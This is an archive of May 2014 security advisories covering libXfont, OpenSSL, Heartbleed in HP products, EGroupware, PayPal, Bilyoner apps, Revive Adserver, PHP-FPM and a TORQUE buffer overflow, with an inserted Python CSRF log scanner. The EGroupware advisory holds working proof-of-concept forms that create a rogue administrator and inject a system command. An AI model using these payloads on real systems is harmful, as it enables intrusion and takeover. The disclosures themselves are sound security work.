[SECURITY] [DSA 2927-1] libxfont security update

2014-05-15 Thread Salvatore Bonaccorso

- -
Debian Security Advisory DSA-2927-1   secur...@debian.org
http://www.debian.org/security/  Salvatore Bonaccorso
May 13, 2014   http://www.debian.org/security/faq
- -

Package: libxfont
CVE ID : CVE-2014-0209 CVE-2014-0210 CVE-2014-0211

Ilja van Sprundel of IOActive discovered several security issues in the
X.Org libXfont library, which may allow a local, authenticated user to
attempt to raise privileges; or a remote attacker who can control the
font server to attempt to execute code with the privileges of the X
server.

CVE-2014-0209

Integer overflow of allocations in font metadata file parsing could
allow a local user who is already authenticated to the X server to
overwrite other memory in the heap.

CVE-2014-0210

libxfont does not validate length fields when parsing xfs protocol
replies, allowing writes past the bounds of allocated memory when
storing the returned data from the font server.

CVE-2014-0211

Integer overflows calculating memory needs for xfs replies could
result in allocating too little memory and then writing the returned
data from the font server past the end of the allocated buffer.

For the oldstable distribution (squeeze), these problems have been fixed in
version 1:1.4.1-5.

For the stable distribution (wheezy), these problems have been fixed in
version 1:1.4.5-4.

For the unstable distribution (sid), these problems have been fixed in
version 1:1.4.7-2.

We recommend that you upgrade your libxfont packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



FreeBSD Security Advisory FreeBSD-SA-14:10.openssl

2014-05-15 Thread FreeBSD Security Advisories

=
FreeBSD-SA-14:10.openssl                                    Security Advisory
                                                          The FreeBSD Project

Topic:          OpenSSL NULL pointer dereference vulnerability

Category:       contrib
Module:         openssl
Announced:      2014-05-13
Affects:        FreeBSD 10.x.
Corrected:      2014-05-13 23:19:16 UTC (stable/10, 10.0-STABLE)
                2014-05-13 23:22:28 UTC (releng/10.0, 10.0-RELEASE-p3)
CVE Name:       CVE-2014-0198

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit URL:http://security.FreeBSD.org/.

I.   Background

FreeBSD includes software from the OpenSSL Project.  The OpenSSL Project is
a collaborative effort to develop a robust, commercial-grade, full-featured
Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)
and Transport Layer Security (TLS v1) protocols as well as a full-strength
general purpose cryptography library.

The TLS protocol supports an alert protocol which can be used to signal the
other party with certain failures in the protocol context that may require
immediate termination of the connection.

II.  Problem Description

An attacker can trigger generation of an SSL alert which could cause a null
pointer dereference.

III. Impact

An attacker may be able to cause a service process that uses OpenSSL to crash,
which can be used in a denial-of-service attack.

IV.  Workaround

No workaround is available, but systems that do not use OpenSSL to implement
the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1)
protocols, or not using SSL_MODE_RELEASE_BUFFERS and use the same process
to handle multiple SSL connections, are not vulnerable.

The FreeBSD base system service daemons and utilities do not use the
SSL_MODE_RELEASE_BUFFERS mode.  However, many third party software uses this
mode to reduce their memory footprint and may therefore be affected by this
issue.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch http://security.FreeBSD.org/patches/SA-14:10/openssl.patch
# fetch http://security.FreeBSD.org/patches/SA-14:10/openssl.patch.asc
# gpg --verify openssl.patch.asc

b) Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

Recompile the operating system using buildworld and installworld as
described in URL:http://www.FreeBSD.org/handbook/makeworld.html.

Restart all daemons using the library, or reboot the system.

3) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

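Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/10/                                                        r265986
releng/10.0/                                                      r265987
-------------------------------------------------------------------------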

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

URL:http://svnweb.freebsd.org/base?view=revision&revision=NN

VII. References

URL:http://ftp.openbsd.org/pub/OpenBSD/patches/5.5/common/005_openssl.patch.sig

URL:https://rt.openssl.org/Ticket/Display.html?user=guest&pass=guest&id=3321

URL:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198

The latest revision of this advisory is available at
URL:http://security.FreeBSD.org/advisories/FreeBSD-SA-14:10.openssl.asc

CSRF and Remote Code Execution in EGroupware

2014-05-15 Thread High-Tech Bridge Security Research
Advisory ID: HTB23212
Product: EGroupware
Vendor: http://www.egroupware.org/
Vulnerable Version(s): 1.8.006 community edition and probably prior
Tested Version: 1.8.006 community edition
Advisory Publication:  April 23, 2014  [without technical details]
Vendor Notification: April 23, 2014 
Vendor Patch: May 6, 2014 
Public Disclosure: May 14, 2014 
Vulnerability Type: Cross-Site Request Forgery [CWE-352], Code Injection 
[CWE-94]
CVE References: CVE-2014-2987, CVE-2014-2988
Risk Level: High 
CVSSv2 Base Scores: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P), 8.5 
(AV:N/AC:M/Au:S/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered CSRF and Remote Code 
Execution vulnerabilities in EGroupware, which can be exploited by remote 
attacker to gain full control over the application and compromise vulnerable 
system.


1) Cross-Site Request Forgery (CSRF) in EGroupware: CVE-2014-2987


The vulnerability exists due to insufficient verification of the HTTP request 
origin. A remote attacker can create a new user account with administrative 
privileges by tricking a logged-in Groupware administrator into visiting a 
malicious page with a CSRF exploit. 

Simple CSRF exploit below creates new administrator with login immuniweb and 
password immuniweb:


<form action="http://[host]/index.php?menuaction=admin.uiaccounts.add_user" method="post" name="main">
<input type="hidden" name="account_lid" value="immuniweb">
<input type="hidden" name="account_status" value="A">
<input type="hidden" name="account_firstname" value="firstname">
<input type="hidden" name="account_lastname" value="lastname">
<input type="hidden" name="account_passwd" value="immuniweb">
<input type="hidden" name="account_passwd_2" value="immuniweb">
<input type="hidden" name="changepassword" value="1">
<input type="hidden" name="expires" value="2014/04/29">
<input type="hidden" name="never_expires" value="True">
<input type="hidden" name="account_email" value="immuni...@immuniweb.com">
<input type="hidden" name="account_groups[]" value="-2">
<input type="hidden" name="account_primary_group" value="-2">
<input type="hidden" name="submit" value="Add">
<input type="submit" id="btn">
</form>



2) Code Injection in EGroupware: CVE-2014-2988


The vulnerability exists due to insufficient sanitisation of input data passed 
via the HTTP POST newsettings parameter to PHP function call_user_func(). A 
remote attacker with administrative privileges can inject and execute arbitrary 
PHP code on the target system with privileges of the webserver. 


This vulnerability can be exploited in pair with the above-described CSRF 
vulnerability.

The following exploitation example writes immuniweb word into file /1.php:


<form action="http://[host]/index.php?menuaction=admin.uiconfig.index&appname=phpbrain" method="post" name="main">
<input type="hidden" name="newsettings[system]" value="echo immuniweb1.php">
<input type="hidden" name="submit" value="Save">
<input type="submit" id="btn">
</form>




---

Solution:

Update to EGroupware version 1.8.007

More Information:
http://www.egroupware.org/forum#nabble-td3997580
http://www.egroupware.org/changelog

---

References:

[1] High-Tech Bridge Advisory HTB23212 - 
https://www.htbridge.com/advisory/HTB23212 - CSRF and Remote Code Execution in 
EGroupware.
[2] EGroupware - http://www.egroupware.org/ - EGroupware is the leading open 
source collaboration tool and the top choice for big enterprises, SMEs and 
teams within and across organizations all over the globe.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided as is and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



[security bulletin] HPSBMU03040 rev.1 - HP LoadRunner HP Performance Center, running OpenSSL, Remote Disclosure of Information

2014-05-15 Thread security-alert


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04286049

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04286049
Version: 1

HPSBMU03040 rev.1 - HP LoadRunner & HP Performance Center, running OpenSSL,
Remote Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-05-14
Last Updated: 2014-05-14

Potential Security Impact: Remote disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP LoadRunner and
HP Performance Center running OpenSSL. This is the OpenSSL vulnerability
known as Heartbleed which could be exploited remotely resulting in
disclosure of information.

References: CVE-2014-0160, SSRT101565

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

HP LoadRunner 11.52, 12.00
HP Performance Center 11.52, 12.00

BACKGROUND

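CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector             Base Score
CVE-2014-0160    (AV:N/AC:L/Au:N/C:P/I:N/A:N)       5.0
===========================================================
             Information on CVSS is documented
            in HP Customer Notice: HPSN-2008-002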

RESOLUTION

HP has made the following software updates available to resolve this
vulnerability:

HP LoadRunner 11.52, patch 2:

LoadRunner Full:

http://support.openview.hp.com/selfsolve/document/LID/LR_03328

VuGen SA :

http://support.openview.hp.com/selfsolve/document/LID/LRVUG_00092

Analysis SA:

http://support.openview.hp.com/selfsolve/document/LID/LRANLSYS_00074

Load Generator SA Windows:

http://support.openview.hp.com/selfsolve/document/LID/LRLG_00051

Load Generator SA Linux:

http://support.openview.hp.com/selfsolve/document/LID/LR_03304

MI Listener:

http://support.openview.hp.com/selfsolve/document/LID/LR_03306

MoFW:

http://support.openview.hp.com/selfsolve/document/LID/LR_03305

Monitor Probe for Microsoft COM+ Server Components:

http://support.openview.hp.com/selfsolve/document/LID/LR_03307

LoadRunner 12.00 patch 1:

LoadRunner Full:

http://support.openview.hp.com/selfsolve/document/LID/LR_03329

VuGen SA:

http://support.openview.hp.com/selfsolve/document/LID/LRVUG_00094

Analysis SA:

http://support.openview.hp.com/selfsolve/document/LID/LRANLSYS_00075

Load Generator SA for Windows:

http://support.openview.hp.com/selfsolve/document/LID/LRLG_00052

Load Generator SA for Linux:

http://support.openview.hp.com/selfsolve/document/LID/LR_0

MI Listener:

http://support.openview.hp.com/selfsolve/document/LID/LR_03316

MoFW:

http://support.openview.hp.com/selfsolve/document/LID/LR_03315

VS2010 IDE Addin:

http://support.openview.hp.com/selfsolve/document/LID/LR_03332

Performance Center v11.52:

http://support.openview.hp.com/selfsolve/document/LID/PC_00296

Performance Center 12.00:

http://support.openview.hp.com/selfsolve/document/LID/PC_00299

HP recommends following our security guidelines including the following
action items:

Revocation of the old key pairs that were just superseded
Changing potentially affected passwords
Invalidating all session keys and cookies

NOTE: Bulletin Applicability:

This bulletin applies to each OpenSSL component that is embedded within the
HP products listed in the security bulletin. The bulletin does not apply to
any other 3rd party application (e.g. operating system, web server, or
application server) that may be required to be installed by the customer
according to instructions in the product install guide.

To learn more about HP Software Incident Response, please visit
http://www8.hp.com/us/en/software-solutions/enterprise-software-security-center/response-center.html.

Software updates are available from HP Software Support Online at
http://support.openview.hp.com/downloads.jsp

HISTORY
Version:1 (rev.1) - 14 May 2014 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:

Paypal Inc Bug Bounty #109 MOS - Bypass Persistent Vulnerability

2014-05-15 Thread Vulnerability Lab
Document Title:
===
Paypal Inc Bug Bounty #109 MOS - Bypass & Persistent Vulnerability



References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1050

PayPal Security UID: Pq115cey



Release Date:
=
2014-05-14


Vulnerability Laboratory ID (VL-ID):

1050


Common Vulnerability Scoring System:

4


Product & Service Introduction:
===
PayPal is a global e-commerce business allowing payments and money transfers to
be made through the Internet. Online money transfers serve as electronic
alternatives to paying with traditional paper methods, such as checks and money
orders. Originally, a PayPal account could be funded with an electronic debit
from a bank account or by a credit card at the payer's choice. But some time in
2010 or early 2011, PayPal began to require a verified bank account after the
account holder exceeded a predetermined spending limit. After that point,
PayPal will attempt to take funds for a purchase from funding sources according
to a specified funding hierarchy. If you set one of the funding sources as
Primary, it will default to that, within that level of the hierarchy (for
example, if your credit card ending in 4567 is set as the Primary over 1234, it
will still attempt to pay money out of your PayPal balance, before it attempts
to charge your credit card). The funding hierarchy is a balance in the PayPal
account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal
Extras Master Card or Bill Me Later (if selected as primary funding source)
(It can bypass the Balance); a verified bank account; other funding sources,
such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal,
establish their own PayPal deposit account or request a transfer to their bank
account.

PayPal is an acquirer, performing payment processing for online vendors,
auction sites, and other commercial users, for which it charges a fee. It may
also charge a fee for receiving money, proportional to the amount received. The
fees depend on the currency used, the payment option used, the country of the
sender, the country of the recipient, the amount sent and the recipient's
account type. In addition, eBay purchases made by credit card through PayPal
may incur extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its
corporate headquarters are in San Jose, California, United States at eBay's
North First Street satellite office campus. The company also has significant
operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the
United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of
July 2007, across Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP),
China's bankcard association, to allow Chinese consumers to use PayPal to shop
online. PayPal is planning to expand its workforce in Asia to 2,000 by the end
of the year 2010.
Between December 4-9, 2010, PayPal services were attacked in a series of
denial-of-service attacks organized by Anonymous in retaliation for PayPal's
decision to freeze the account of WikiLeaks citing terms of use violations over
the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team has discovered a filter bypass & 
persistent Web Vulnerability in the Paypal Inc core web application api.


Vulnerability Disclosure Timeline:
==
2013-08-15: Researcher Notification & Coordination (Ateeq ur Rehman Khan)
2013-08-16: Vendor Notification (PayPal Site Security Team - Bug Bounty Program)
2013-12-22: Vendor Response/Feedback (PayPal Site Security Team - Bug Bounty 
Program)
2014-05-10: Vendor Fix/Patch (PayPal Developer Team - Reward: Bug Bounty)
2013-05-14: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

A filter bypass and persistent script code injection vulnerability has been 
discovered in the official Paypal service application and common service api. 
The vulnerability allows an attacker to inject own malicious script codes in 
the vulnerable module on the application side (persistent).

The vulnerability has been discovered in the Paypal MOS (Multi Order Shipping) 
Web Application (https://ship.paypal.com) and the vulnerability exists 
in the `Preset` module. While creating a new shipping preset, an 

[SECURITY] [DSA 2928-1] linux-2.6 security update

2014-05-15 Thread dann frazier

- --
Debian Security Advisory DSA-2928-1                secur...@debian.org
http://www.debian.org/security/                           Dann Frazier
May 14, 2014                        http://www.debian.org/security/faq
- --

Package: linux-2.6
Vulnerability  : privilege escalation/denial of service/information leak
Problem type   : local
Debian-specific: no
CVE Id(s)  : CVE-2014-0196 CVE-2014-1737 CVE-2014-1738

Several vulnerabilities have been discovered in the Linux kernel that may lead
to a denial of service, information leak or privilege escalation. The Common
Vulnerabilities and Exposures project identifies the following problems:

CVE-2014-0196

Jiri Slaby discovered a race condition in the pty layer, which could lead
to a denial of service or privilege escalation.

CVE-2014-1737 CVE-2014-1738

Matthew Daley discovered an information leak and missing input
sanitising in the FDRAWCMD ioctl of the floppy driver. This could result
in a privilege escalation.

For the oldstable distribution (squeeze), this problem has been fixed in
version 2.6.32-48squeeze6.

The following matrix lists additional source packages that were rebuilt for
compatibility with or to take advantage of this update:

 Debian 6.0 (squeeze)
 user-mode-linux 2.6.32-1um-4+48squeeze6

We recommend that you upgrade your linux-2.6 and user-mode-linux packages.

Note: Debian carefully tracks all known security issues across every
linux kernel package in all releases under active security support.
However, given the high frequency at which low-severity security
issues are discovered in the kernel and the resource requirements of
doing an update, updates for lower priority issues will normally not
be released for all kernels at the same time. Rather, they will be
released in a staggered or leap-frog fashion.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



Bilyoner mobile apps prone to various SSL/TLS attacks

2014-05-15 Thread harun . esur
=
  Sceptive Security Advisory

Synopsis:  Bilyoner mobile apps prone to various SSL/TLS attacks
Product: Various mobile applications
Advisory URL:
http://sceptive.com/p/bilyoner-mobile-apps-prone-to-various-ssltls-attacks
Advisory number: CVE-2014-3750
Issue date:  2014-04-02
=

1. Summary:

Bilyoner [1] is an online betting platform for various betting options on idda 
[2] , spor toto [3], milli piyango [4], tjk [5].

We have found that the mobile apps are vulnerable to SSL/TLS attacks, which 
eventually lets attackers gain sensitive information and hijack user sessions.

2. Description:

On misconfigured network environments it is possible to redirect HTTPS packets 
over MITM tools for SSL sessions.

When we redirected our network on such a configuration we have observed that 
the app sends/receives user data unencrypted.

REQUEST

{
    password: 333444,
    sessionId: 9331b4c44edf7c72f4963bc1799416bd071b5eb2aa049ad7ce968b06965f444e,
    username: 12312312
}

And also session-id's are vulnerable for attackers to use on their own 
configurations to hijack other users' sessions. Such as;

RESPONSE

{
    bilyonerCookies: {
        JSESSIONID: RQdFTcnPydRypLXc71kXhYjBtN5p5sGT31GN4hvRlsN8qTz2GQ2T!-1656694263,
        NSC_wtfswfs-ttm: c3a0840e45525d5f4f58455e445a4a423660
    },
    bilyonerSessionId: C1yTTcnP2wSnwyV2gstRkhrsBh8dsqJfvCYBFHqTGvVwhZSYhsJM!-1656694263!1394403087638,
    sessionId: 9331b4c44edf7c72f4963bc1799416bd071b5eb2aa049ad7ce968b06965f444e
}

3. Solution:

For Android apps it's advised to upgrade to 2.3.1. For iOS platforms 4.6.2 is 
available.

4. Links:

[1] http://www.bilyoner.com/
[2] http://www.iddaa.com/
[3] https://www.sportoto.gov.tr/
[4] http://www.millipiyango.gov.tr/
[5] http://www.tjk.org/EN

5. Contact:

Harun Esur harun.e...@sceptive.com

Copyright 2014 Sceptive http://sceptive.com

=


[REVIVE-SA-2014-001] Revive Adserver 3.0.5 fixes CSRF vulnerability

2014-05-15 Thread Matteo Beccati

Revive Adserver Security Advisory REVIVE-SA-2014-001

Advisory ID:           REVIVE-SA-2014-001
CVE ID:                CVE-2013-5954
Date:                  2014-05-15
Security risk:         Moderate
Applications affected: Revive Adserver
Versions affected:     <= 3.0.4
Versions not affected: >= 3.0.5
Website:               http://www.revive-adserver.com/




Vulnerability: CSRF


Description
---
A CSRF vulnerability was recently discovered and reported in OpenX
Source Security Advisory CVE-2013-5954. However, the number of places in
the code which were affected go well beyond those listed in the original
advisory.

The vulnerability allows users who are logged into the Revive Adserver
console to be tricked into deleting data from their Revive Adserver
installation. The vulnerability does not allow remote users to access
the Revive Adserver console or otherwise modify data.

Although the attack can cause loss of data and service disruptions, the
risk is rated to be moderate as the vulnerability requires the victim to
interact with the attack mechanism.

The vulnerability is also present and exploitable in OpenX Source 2.8.11
and earlier versions, potentially back to phpAdsNew 2.0.x.

Details
---
HTTP GET methods are used extensively in the Revive Adserver web console
for deleting data or unlinking accounts etc. instead of HTTP POST. These
older style calls were not protected to prevent attack via CSRF.

The scripts that have been fixed are:

www/admin/admin-user-unlink.php
www/admin/advertiser-delete.php
www/admin/advertiser-user-unlink.php
www/admin/affiliate-delete.php
www/admin/affiliate-user-unlink.php
www/admin/agency-delete.php
www/admin/agency-user-unlink.php
www/admin/banner-delete.php
www/admin/campaign-delete.php
www/admin/channel-delete.php
www/admin/tracker-delete.php
www/admin/userlog-delete.php
www/admin/zone-delete.php

References
--
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5954
https://github.com/revive-adserver/revive-adserver/commit/79cb2db05c9849e225885e8a622978da014a98a7

Permalink
-
http://www.revive-adserver.com/security/revive-sa-2014-001


Solution


We strongly advise people to upgrade to the most recent 3.0.5 version of
Revive Adserver, including those running OpenX Source or older versions
of the application.


Contact Information
===

The security contact for Revive Adserver can be reached at:
security AT revive-adserver DOT com


-- 
Matteo Beccati
On behalf of the Revive Adserver Team
http://www.revive-adserver.com/
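
A defender-side companion to the two CSRF advisories above (HTB23212 and REVIVE-SA-2014-001), added here as an example and not taken from either advisory or project: it scans web access logs for accepted requests to the endpoints those advisories name whose Referer is missing or off-site. The hostnames, client addresses, query parameters and log lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: hostnames the two admin consoles are served from.
OWN_HOSTS = {"ads.example.test", "groupware.example.test"}

# Revive Adserver scripts listed as fixed in REVIVE-SA-2014-001.
REVIVE_SCRIPTS = {
    "admin-user-unlink.php", "advertiser-delete.php",
    "advertiser-user-unlink.php", "affiliate-delete.php",
    "affiliate-user-unlink.php", "agency-delete.php",
    "agency-user-unlink.php", "banner-delete.php", "campaign-delete.php",
    "channel-delete.php", "tracker-delete.php", "userlog-delete.php",
    "zone-delete.php",
}
# menuaction values targeted by the two forms in HTB23212.
EGW_ACTIONS = {"admin.uiaccounts.add_user", "admin.uiconfig.index"}

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)


def sensitive_endpoint(target):
    """Return a label if the request target is one of the advisory endpoints."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    if "/admin/" in parts.path and script in REVIVE_SCRIPTS:
        return "revive:" + script
    if script == "index.php":
        action = parse_qs(parts.query).get("menuaction", [""])[0]
        if action in EGW_ACTIONS:
            return "egroupware:" + action
    return None


def referer_verdict(referer):
    """Return None for a same-site Referer, else the reason it is suspect."""
    if referer in ("", "-"):
        return "no-referer"  # cannot confirm the request came from the console
    host = urlsplit(referer).hostname
    if host is None or host not in OWN_HOSTS:
        return "foreign-referer"
    return None


def find_csrf_candidates(lines):
    """List (ip, method, endpoint, reason) for requests worth reviewing."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m is None:
            continue
        endpoint = sensitive_endpoint(m["target"])
        reason = referer_verdict(m["referer"])
        accepted = m["status"][0] in "23"  # 4xx/5xx means the app refused it
        if endpoint and reason and accepted:
            hits.append((m["ip"], m["method"], endpoint, reason))
    return hits


# Constructed sample log lines (documentation address ranges, made-up ids).
SAMPLE_LOG = [
    '198.51.100.7 - - [15/May/2014:09:10:01 +0000] "GET /www/admin/campaign-delete.php?id=7 HTTP/1.1" 302 - "http://ads.example.test/www/admin/index.php" "Mozilla/5.0"',
    '198.51.100.7 - - [15/May/2014:09:12:40 +0000] "GET /www/admin/banner-delete.php?id=3 HTTP/1.1" 302 - "http://forum.example.net/thread/42" "Mozilla/5.0"',
    '198.51.100.9 - - [15/May/2014:09:13:02 +0000] "POST /index.php?menuaction=admin.uiaccounts.add_user HTTP/1.1" 200 5120 "http://forum.example.net/thread/42" "Mozilla/5.0"',
    '198.51.100.9 - - [15/May/2014:09:20:15 +0000] "POST /index.php?menuaction=admin.uiaccounts.add_user HTTP/1.1" 200 5120 "http://groupware.example.test/index.php" "Mozilla/5.0"',
    '198.51.100.7 - - [15/May/2014:09:31:00 +0000] "GET /www/admin/zone-delete.php?id=1 HTTP/1.1" 302 - "-" "Mozilla/5.0"',
    '198.51.100.7 - - [15/May/2014:09:31:05 +0000] "GET /www/admin/zone-delete.php?id=2 HTTP/1.1" 403 - "http://forum.example.net/thread/42" "Mozilla/5.0"',
    '198.51.100.8 - - [15/May/2014:09:40:00 +0000] "GET /www/admin/index.php HTTP/1.1" 200 900 "http://forum.example.net/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_csrf_candidates(SAMPLE_LOG):
        print(hit)
```

A missing Referer is reported separately from a foreign one because privacy settings and proxies strip the header legitimately, so those hits need manual review rather than automatic escalation.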


[ MDVSA-2014:087 ] php

2014-05-15 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2014:087
 http://www.mandriva.com/en/support/security/
 ___

 Package : php
 Date: May 15, 2014
 Affected: Business Server 1.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in php:
 
 PHP FPM in PHP versions before 5.4.28 and 5.5.12 uses a UNIX domain
 socket with world-writable permissions by default, which allows any
 local user to connect to it and execute PHP scripts as the apache user
 (CVE-2014-0185).
 
 The updated php packages have been upgraded to the 5.5.12 version
 which is not vulnerable to this issue.
 
 Additionally, the timezonedb packages have been upgraded to the latest
 2014.3 version, the php-suhosin packages have been upgraded to the
 latest 0.9.35 version which has better support for php-5.5 and the
 PECL packages which require so have been rebuilt for php-5.5.12.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0185
 ___

 Updated Packages:

 Mandriva Business Server 1/X86_64:

[CVE-2014-0749] TORQUE Buffer Overflow

2014-05-15 Thread john . fitzpatrick
A buffer overflow exists in versions of TORQUE which can be exploited in order 
to remotely execute code from an unauthenticated perspective. This issue is 
exploitable in all versions of the 2.5 branch, up to and including 2.5.13.

Software: TORQUE
Affected Versions: All 2.5 releases up to and including 2.5.13
CVE Reference: CVE-2014-0749
Authors: John Fitzpatrick (MWR Labs)
Severity: High Risk
Vendor: Adaptive Computing
Vendor Response: Incorporated MWR supplied fix into 2.5 development branch, no 
advisory

[Description]

A buffer overflow exists in older versions of TORQUE which can be exploited in 
order to remotely execute code from an unauthenticated perspective. This issue 
is exploitable in all versions of the 2.5 branch, up to and including 2.5.13.


[Impact]

Successful exploitation allows remote execution of code as root.


[Cause]

This issue exists as a result of a misplaced bounds check.


[Solution]

Despite still being widely used, Torque 2.5.x is now end of life and no longer 
supported by Adaptive. The latest version of the 2.5 branch (2.5.13) is 
vulnerable to this issue. MWR have submitted a fix to the 2.5-dev GitHub 
repository (which is still active) which resolves this issue. It is strongly 
recommended that a version of 2.5-dev (later than pull request #171) is updated 
to.

Code changes in the 4.2.x branch significantly enhance the security posture of 
TORQUE and so MWR would recommend updating to this branch if possible.


[Technical Details]

TORQUE is a widely used resource manager. There are several branches: 2.x, 3.x 
and 4.x. The code is open source, but maintained by Adaptive Computing.
Operations such as job submissions and querying of job queues within TORQUE are 
handled by the pbs_server component. It was found that the pbs_server did not 
perform sufficient bounds checking on messages sent to it. As a result it was 
found to be possible to submit messages which resulted in an overflow leading 
to arbitrary code execution. This could be achieved from a remote, 
unauthenticated perspective regardless of whether the source IP address is 
permitted to submit jobs or not.

The vulnerability exists because the file disrsi_.c fails to ensure that the 
length of count (which is read from the request packet) is less than dis_umaxd 
prior to being used in a later memcpy(). As a result a specially crafted 
request can smuggle through a count value which is later decremented and 
becomes the ct value in a memcpy() made from within tcp_gets():

memcpy((char *)str, tp->tdis_leadp, ct);

This failure to validate count allows control over the size of the memcpy() to 
be leveraged and as a result control over the amount of data read from the 
remainder of the packet. If this value is large the memcpy() will overwrite the 
stack and so can be leveraged in order to gain control over the execution of 
the program.

A backtrace showing the flow of execution is shown below:

#0 0x003dd4a88b9a in memcpy () from /lib64/libc.so.6
#1 0x7fa0008cb65b in tcp_gets (fd=11, str=0x7fff8dfce741 '3' <repeats 26 times>, Ab1Ab2Ab3, ct=332)
    at ../Libifl/tcp_dis.c:567
#2 0x7fa0008be994 in disrsi_ (stream=11, negate=0x7fff8dfce93c, value=0x7fff8dfce938, count=333)
    at ../Libdis/disrsi_.c:187
#3 0x7fa0008bea1a in disrsi_ (stream=11, negate=0x7fff8dfce93c, value=0x7fff8dfce938, count=<value optimized out>)
    at ../Libdis/disrsi_.c:216
#4 0x7fa0008bea1a in disrsi_ (stream=11, negate=0x7fff8dfce93c, value=0x7fff8dfce938, count=<value optimized out>)
    at ../Libdis/disrsi_.c:216
#5 0x7fa0008bdfab in disrfst (stream=11, achars=33, value=0x27f0b58 )
    at ../Libdis/disrfst.c:125
#6 0x7fa0008c13ba in decode_DIS_ReqHdr (sock=11, preq=0x27f0b20, proto_type=0x7fff8dfce9dc, proto_ver=0x7fff8dfce9d8)
    at ../Libifl/dec_ReqHdr.c:141
#7 0x00409ba1 in dis_request_read (sfds=11, request=0x27f0b20) at dis_read.c:137
#8 0x0041cb6e in process_request (sfds=11) at process_request.c:355
#9 0x7fa0008d4899 in wait_request (waittime=<value optimized out>, SState=0x72c258)
    at ../Libnet/net_server.c:508
#10 0x0041afeb in main_loop () at pbsd_main.c:1203
#11 0x0041bd15 in main (argc=<value optimized out>, argv=<value optimized out>)
    at pbsd_main.c:1760

TORQUE is required to run as root and so successful exploitation leads to code 
